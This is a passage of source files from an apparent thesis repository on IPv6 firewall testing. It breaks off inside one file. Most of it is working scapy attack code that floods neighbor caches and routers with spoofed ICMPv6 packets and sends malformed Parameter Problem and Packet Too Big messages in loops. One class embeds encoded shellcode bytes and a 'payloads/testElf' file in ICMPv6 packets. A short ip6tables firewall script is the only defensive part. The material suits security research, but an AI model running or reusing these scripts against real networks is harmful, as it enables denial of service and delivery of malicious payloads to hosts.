ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n return Ether(src=srcMac)/IPv6(dst=solicitedMulti,src=srcIpAdr)/ICMPv6ND_NS(tgt=srcIpAdr)/sourceLinkLayer\n\n def buildPacketRemoteLinuxSelfSolicitation(self):\n sourceLinkLayer = ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n return Ether(src=self.firewallMac)/IPv6(dst=self.linux,src=self.linux)/ICMPv6ND_NS(tgt=self.linux)/sourceLinkLayer\n\n #interface to Internal Tests\n\n def execModuleInternalCacheFloodingWin(self, exitIface):\n start = 0x000001\n end = 0xfffffe\n for t in xrange(start, end):\n hex24 = '{:06x}'.format(t)\n mac = \"08:00:27:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #solicitedEtherMulti = \"33:33:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n globalUni = \"2001:abcd:acad:2::\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #allnodes = \"ff02::1\"\n #solicitedIPv6 = \"ff02::1:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n packetContainer = self.buildPacketInternalCacheFlooding(mac, globalUni, self.win)\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalCacheFloodingLinux(self, exitIface):\n start = 0x000001\n end = 0xfffffe\n for t in xrange(start, end):\n hex24 = '{:06x}'.format(t)\n mac = \"08:00:27:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #solicitedEtherMulti = \"33:33:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n globalUni = \"2001:abcd:acad:2::\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n #allnodes = \"ff02::1\"\n #solicitedIPv6 = \"ff02::1:ff:\" + hex24[:2] + \":\" + hex24[2:4] + \":\" + hex24[4:6]\n packetContainer = self.buildPacketInternalCacheFlooding(mac, globalUni, self.linux)\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalWinSelfSol(self, exitIface):\n packetContainer = self.buildPacketInternalSelfSolicitation(self.winMac, self.win, self.winSolicitedMulti)\n for t in range(1,100):\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalLinuxSelfSol(self, exitIface):\n packetContainer = self.buildPacketInternalSelfSolicitation(self.linuxMac, self.linux, self.linuxSolicitedMulti)\n for t in range(1,100):\n sendp(packetContainer, iface=exitIface, verbose=False)\n\n #interface to external test\n def execModuleRemoteLinuxSelfSol(self, exitIface):\n packetContainer = self.buildPacketRemoteLinuxSelfSolicitation()\n for t in range(1,100):\n sendp(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.5755876898765564, "alphanum_fraction": 0.6055639386177063, "avg_line_length": 33.318519592285156, "blob_id": "17b1f667c77e5b7a245e2d47e2cbf51f2b0c47d4", "content_id": "81dcd0dc0005d1ec120b05ae9c786e94c759fe28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4637, "license_type": "no_license", "max_line_length": 81, "num_lines": 135, "path": "/python/code/allAttackingTest.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport re, uuid\nimport os\nimport readline\nfrom pprint import pprint\nfrom commands import *\nfrom scapy.all import *\nfrom receiver import *\nfrom bitstring import *\n\n\"\"\"\nThis class is for testing all attacking channels in one\n\"\"\"\nclass AllAttackingTests:\n\n def __init__(self, iface):\n self.ipAddress = '2001:db8:acad:2::2'\n self.iface = iface\n self.name = 'AllAttackingTests'\n self.path = 'payloads/testElf'\n\n def startSystem(self):\n Commands.setAllAttackingTestHistory()\n running = 1\n while running:\n readline.parse_and_bind(\"tab: complete\")\n #we receive data from the keyboard \n command = raw_input(self.name + ' >>')\n #help command\n if re.match('help', command):\n self.showHelp()\n #quit module command\n elif re.match('quit', command):\n running = 0\n Commands.setCovertChannelHistory()\n elif re.match('setAdr', command):\n self.ipAddress = re.sub('setAdr', ' ', command).lstrip()\n print 'setting Ip address: ' + self.ipAddress\n #execution of all tests\n elif re.match('exec', command):\n dest = DestinationUnreachableMalPayloadLinux(self.path)\n dest.execModule(self.iface, self.ipAddress)\n echoReq = EchoRequestMalPayloadLinux(self.path)\n echoReq.execModule(self.iface, self.ipAddress)\n echoReply = EchoReplyMalPayloadLinux(self.path)\n echoReply.execModule(self.iface, self.ipAddress)\n neighbSol = NeighborSolicitationMalPayloadLinux(self.path)\n neighbSol.execModule(self.iface, self.ipAddress)\n \n def showHelp(self):\n for entry in Help.getAllAttackingTestHelp():\n print entry\n\n\n\"\"\"\nthe class build destination unreachable messages with malicious payload for linux\n\"\"\"\nclass DestinationUnreachableMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Dest Unreach'\n self.path = path\n self.buf = \"\"\n self.buf += \"\\xdd\\xc0\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\\x14\\xbd\\x4b\"\n self.buf += \"\\xa8\\x1a\\xfe\\x83\\xc2\\x04\\x31\\x6a\\x14\\x03\\x6a\\x5f\\x4a\"\n self.buf += \"\\xef\\xcf\\x84\\xd9\\x53\\x63\\x50\\xd4\\xda\\x62\\xce\\x8e\\x84\"\n self.buf += \"\\xa9\\x8e\\xd9\\xac\\x5a\\x8e\\xe5\\xce\\x9a\\xe6\\xe5\\xce\\x9a\"\n self.buf += \"\\xe6\\x8d\\xce\\x9a\\x06\\x4e\\xa7\\x36\\xab\\x4e\\x35\\x2f\\x93\"\n self.buf += \"\\x4f\\x34\\x17\\x81\\x29\\x2e\\x66\\x9e\\xd0\\xc6\\x62\\xe0\\x95\"\n self.buf += \"\\xf6\\x19\\xfc\\xf4\\xae\\x54\\x1d\\xb5\\x0d\\x0d\\xbb\\x62\\x5f\"\n self.buf += \"\\x51\\xca\\x60\\xe9\\x5e\\x7c\\x85\\xdb\\xdf\\xf5\\x55\\x1c\\x3e\"\n\n \n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packetCode0 = IPv6(dst=ipAdr)/ICMPv6DestUnreach(code=0)/self.buf\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packetCode0, iface=exitIface, verbose=False)\n\n\n\nclass EchoRequestMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Echo Request'\n self.path = path\n \n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packet = IPv6(dst=ipAdr)/ICMPv6EchoRequest(data=self.payload)\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packet, iface=exitIface, verbose=False)\n \nclass EchoReplyMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Echo Reply'\n self.path = path\n\n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packet = IPv6(dst=ipAdr)/ICMPv6EchoReply(data=self.payload)\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packet, iface=exitIface, verbose=False)\n\n\nclass NeighborSolicitationMalPayloadLinux:\n \n def __init__(self, path):\n print 'Attacking Neighbor Solicitation'\n self.path = path\n\n def buildPacket(self, ipAdr):\n data = open(self.path.strip(), 'rb')\n self.payload = data.read()\n data.close()\n self.packet = IPv6(dst=ipAdr)/ICMPv6ND_NS()/self.payload\n \n def execModule(self, exitIface, ipAdr):\n self.buildPacket(ipAdr)\n send(self.packet, iface=exitIface, verbose=False)\n\n\n\n\n" }, { "alpha_fraction": 0.6755820512771606, "alphanum_fraction": 0.7225322127342224, "avg_line_length": 58.735633850097656, "blob_id": "9928dde49d6c379d2d0238f6255c03686b92701f", "content_id": "ac97867c6c22023f0651cb9c773a250690e45f1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5197, "license_type": "no_license", "max_line_length": 186, "num_lines": 87, "path": "/python/code/parameterProblem.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Parameter Problem messages\n\"\"\"\nclass ParameterProblem:\n \n def __init__(self):\n print 'Parameter Problem'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def execModuleParameterProblemBadCodeWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(4, 256):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=code)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemBadCodeLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for code in range(4, 256):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=code)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodPointerWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0,1024):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=0,ptr=ptr)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodPointerLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 1024):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=0, ptr=ptr)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodHighPointerWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(3024000000,3024001000):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=0,ptr=ptr)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemFloodHighPointerLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(3024000000,3024001000):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=0, ptr=ptr)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemErrHeaderWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=0)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemErrHeaderLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=0)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecHeaderWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=1)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecHeaderLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=1)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecIPOptionrWin(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for x in range(0,500):\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6ParamProblem(code=2)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleParameterProblemUnrecIPOptionLinux(self, exitIface):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n for ptr in range(0, 500):\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6ParamProblem(code=2)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.7055397629737854, "alphanum_fraction": 0.7431818246841431, "avg_line_length": 57.650001525878906, "blob_id": "390256b6d5d2349c57cb671a0baf7cb236d52ee6", "content_id": "abc7a73ecb840a0ee20db8156da60fa237b5da67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7040, "license_type": "no_license", "max_line_length": 146, "num_lines": 120, "path": "/thesis/files/firewall_rules.sh", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#define in out variables\nINSIDEIF=eth0\nINSIDENET=2001:abcd:acad:2::1/64\nOUTSIDEIF=eth1\nOUTSIDENET=2001:abcd:acad:1::1/64\n\n#activate forwarding\nsysctl -w net/ipv6/conf/all/forwarding=1\n\n#clean all\nip6tables -F\nip6tables -X ICMPV6-TO-OUT\nip6tables -X ICMPV6-TO-IN\nip6tables -X SSH-IN\nip6tables -X SSH-OUT\nip6tables -Z\n\n#create ad hoc chains\nip6tables -N ICMPV6-TO-OUT\nip6tables -N ICMPV6-TO-IN\nip6tables -N SSH-IN\nip6tables -N SSH-OUT\n\n#default policy is to drop (whitelist approach)\nip6tables -P INPUT DROP\nip6tables -P FORWARD DROP\nip6tables -P OUTPUT DROP\n\n#loopback traffic is accepted\nip6tables -A INPUT -s ::1 -d ::1 -j ACCEPT\n\n#accept new ssh traffic on internal interface and network only\nip6tables -A INPUT -i $INSIDEIF -s $INSIDENET -p tcp --dport 22 -m state --state NEW -j ACCEPT\n#accept established and related traffic on all interfaces\nip6tables -A INPUT -p tcp --dport 22 -m state --state ESTABLISHED,RELATED -j ACCEPT\n#accept ndp messages directed to the router/firewall (this is needed because of the policy)\nip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j ACCEPT\nip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-solicitation -j ACCEPT\nip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-advertisement -j ACCEPT\nip6tables -A INPUT -p icmpv6 --icmpv6-type redirect -j ACCEPT\n\n\n\n#accept ssh related and established traffic, and ns,na traffic on output chain\nip6tables -A OUTPUT -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT\nip6tables -A OUTPUT -p icmpv6 --icmpv6-type router-advertisement -j ACCEPT\nip6tables -A OUTPUT -p icmpv6 --icmpv6-type neighbor-solicitation -j ACCEPT\nip6tables -A OUTPUT -p icmpv6 --icmpv6-type neighbor-advertisement -j ACCEPT\nip6tables -A OUTPUT -j LOG --log-prefix \"output drops\"\nip6tables -A OUTPUT -j DROP\n\n#drop icmpv6 packets with link-local src/dst address in forwarding chain\nip6tables -A FORWARD -p icmpv6 -d fe80::/10 -j DROP\nip6tables -A FORWARD -p icmpv6 -s fe80::/10 -j DROP\n#drop echo reply with dst multicast address in forwarding chain\nip6tables -A FORWARD -p icmpv6 -d ff00::/8 --icmpv6-type echo-reply -j DROP\n\n#icmpv6 traffic from internal to be forwarded to external\nip6tables -A FORWARD -s $INSIDENET -d $OUTSIDENET -p icmpv6 -j ICMPV6-TO-OUT\n#ssh traffic from internal to be forwarded to external\nip6tables -A FORWARD -i $INSIDEIF -o $OUTSIDEIF -s $INSIDENET -d $OUTSIDENET -p tcp --dport 22 -m state --state NEW,ESTABLISHED,RELATED -j SSH-OUT\n\n#icmpv6 traffic from external to be forwarded to internal\nip6tables -A FORWARD -d $INSIDENET -p icmpv6 -j ICMPV6-TO-IN\n#ssh traffic from external to be forwarded to internal\nip6tables -A FORWARD -d $INSIDENET -p tcp --sport 22 -m state --state ESTABLISHED,RELATED -j SSH-IN\nip6tables -A FORWARD -j LOG --log-prefix \"FORWARDING DROPS\"\n\n#---------------------------------\n#forwarding rules from IN to OUT -\n#---------------------------------\n\n#accept ssh to be forwarded to external network\nip6tables -A SSH-OUT -i $INSIDEIF -o $OUTSIDEIF -s $INSIDENET -d $OUTSIDENET -p tcp --dport 22 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT\n#accept error messages\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type destination-unreachable -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type packet-too-big -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type time-exceeded -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type parameter-problem -j ACCEPT\n#echo request with rate limit\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type echo-request -m limit --limit 900/min -j ACCEPT\n#echo reply is dropped because of internal policy\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type echo-reply -j DROP\n#NDP messages only if they haven't traversed a router (this is to underline the required hop limit of 255)\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type router-advertisement -m hl --hl-eq 255 -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type neighbor-solicitation -m hl --hl-eq 255 -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type neighbor-advertisement -m hl --hl-eq 255 -j ACCEPT\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 --icmpv6-type redirect -m hl --hl-eq 255 -j ACCEPT\n#drop remaining icmpv6 packets (for clarity, but redundant because of the policy)\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 -j LOG --log-prefix \"Firewall IN-OUT: dropped ICMPv6\"\nip6tables -A ICMPV6-TO-OUT -s $INSIDENET -d $OUTSIDENET -p icmpv6 -j DROP\n\n#--------------------------------\n#forwarding rule from OUT to IN -\n#--------------------------------\n\n#accept established and related ssh to be forwarded to internal network\nip6tables -A SSH-IN -d $INSIDENET -p tcp --sport 22 -m state --state ESTABLISHED,RELATED -j ACCEPT\n#accept error messages ---- TODO: evaluate if it is worth to use state for error msg, and only dst addresses\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type destination-unreachable -j ACCEPT\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type packet-too-big -j ACCEPT\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type time-exceeded -j ACCEPT\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type parameter-problem -j ACCEPT\n#echo request and reply , no ping from outside (internal policy), but allow reply to come back with rate limit\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type echo-request -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type echo-reply -m limit --limit 900/min -j ACCEPT\n#drop explicitly and log ndp messages\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-advertisement -j LOG --log-prefix \"Firewall OUT-IN: dropped ra\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-solicitation -j LOG --log-prefix \"Firewall OUT-IN: dropped rs\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-advertisement -j LOG --log-prefix \"Firewall OUT-IN: dropped na\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-solicitation -j LOG --log-prefix \"Firewall OUT-IN: dropped ns\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type redirect -j LOG --log-prefix \"Firewall OUT-IN: dropped redirect\"\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-advertisement -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type router-solicitation -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-advertisement -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type neighbor-solicitation -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 --icmpv6-type redirect -j DROP\nip6tables -A ICMPV6-TO-IN -d $INSIDENET -p icmpv6 -j DROP\n\n\n" }, { "alpha_fraction": 0.6519148945808411, "alphanum_fraction": 0.7018439769744873, "avg_line_length": 54.79365158081055, "blob_id": "f9ca0fb22fdd2c00280564d44a38a9a932656b33", "content_id": "c7025d1e6d9e0c677626dfcfffe0bbad115fd2cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3525, "license_type": "no_license", "max_line_length": 180, "num_lines": 63, "path": "/python/code/packetTooBig.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Destination Unreachable messages\n\"\"\"\nclass PacketTooBig:\n \n def __init__(self):\n print 'Packet Too Big'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = \"2001:abcd:acad:1::2\"\n self.firewall = \"2001:abcd:acad:2::1\"\n\n def execModulePacketTooBigMTUBigWin(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(mtu=2000)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUBigLinux(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(mtu=2000)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUSmallWin(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(mtu=500)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUSmallLinux(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(mtu=500)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTUWin(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(mtu=1300)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigMTULinux(self, exitIface):\n for x in range(0, 50):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(mtu=1300)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigBadCodeWin(self, exitIface):\n for code in range(1, 256):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.win,src=self.firewall)/ICMPv6PacketTooBig(code=code)/IPv6(dst=self.attacker,src=self.win,hlim=128)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModulePacketTooBigBadCodeLinux(self, exitIface):\n for code in range(1, 256):\n data = \"abcdefghijklmnopqrstuvwabcdefghi\"\n packetContainer = IPv6(dst=self.linux,src=self.firewall)/ICMPv6PacketTooBig(code=code)/IPv6(dst=self.attacker,src=self.linux,hlim=64)/ICMPv6EchoRequest(id=0,seq=0)/data\n send(packetContainer, iface=exitIface, verbose=False)\n\n \n" }, { "alpha_fraction": 0.5026572346687317, "alphanum_fraction": 0.581930935382843, "avg_line_length": 37.931034088134766, "blob_id": "f695166d7819f12e6cbeb760a17a92c59d2e1d0b", "content_id": "3fc3a662271ea5253b2668f5ec83fc2950d8dee2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2258, "license_type": "no_license", "max_line_length": 108, "num_lines": 58, "path": "/python/code/RSAttacks.py", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\n\"\"\"\nThis class test change/addition of prefix and MTU value with Router Advertisement.\n\"\"\" \nclass RS:\n \n def __init__(self):\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.firewall = \"2001:abcd:acad:2::1\"\n self.firewallMac = \"08:00:27:b1:da:41\"\n self.linkFirewall = \"fe80::1\"\n self.prefix = \"2001:abcd:acad:2:\"\n self.allRouter = \"ff02::2\"\n print 'Router Solicitation'\n\n \n def buildPacketInternal(self, mac, src, dst):\n return IPv6(dst=dst,src=src)/ICMPv6ND_RS()/ICMPv6NDOptSrcLLAddr(lladdr=mac)\n\n def buildPacketRemote(self, ipAdr):\n return IPv6(dst=ipAdr,src=self.firewall)/ICMPv6ND_RS()/ICMPv6NDOptSrcLLAddr(lladdr=self.firewallMac)\n\n\n \n def execModuleInternalWin(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n packetContainer = self.buildPacketInternal(mac, globalUni, self.win)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalLinux(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n packetContainer = self.buildPacketInternal(mac, globalUni, self.linux)\n send(packetContainer, iface=exitIface, verbose=False)\n\n def execModuleInternalFirewall(self, exitIface):\n start = 0x0001\n end = 0xffff\n for t in xrange(start, end):\n hex24 = '{:04x}'.format(t)\n mac = \"08:00:27:\" + \"00\" + \":\" + hex24[:2] + \":\" + hex24[2:4]\n globalUni = self.prefix + \":\" + hex24[:2] + \":\" + hex24[2:4]\n packetContainer = self.buildPacketInternal(mac, globalUni, self.allRouter)\n send(packetContainer, iface=exitIface, verbose=False)\n" }, { "alpha_fraction": 0.6630985736846924, "alphanum_fraction": 0.7121126651763916, "avg_line_length": 55.25396728515625, "blob_id": "d2db5c25f061efa005595ce3fc77ab2a10234dd6", "content_id": "c603c1c4f7881953a8b6874d021806887b9b9296", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3550, "license_type": "no_license", "max_line_length": 186, "num_lines": 63, "path": "/python/code/timeExceeded.py~", "repo_name": "antekirtt/thesis", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom scapy.all import *\n\n\"\"\"\nthe class build Time Exceeded messages\n\"\"\"\nclass TimeExceeded:\n \n def __init__(self):\n print 'Time Exceeded'\n self.win = \"2001:abcd:acad:2:b485:2aec:9447:fd83\"\n self.linux = \"2001:abcd:acad:2:a00:27ff:fe84:bb37\"\n self.attacker = 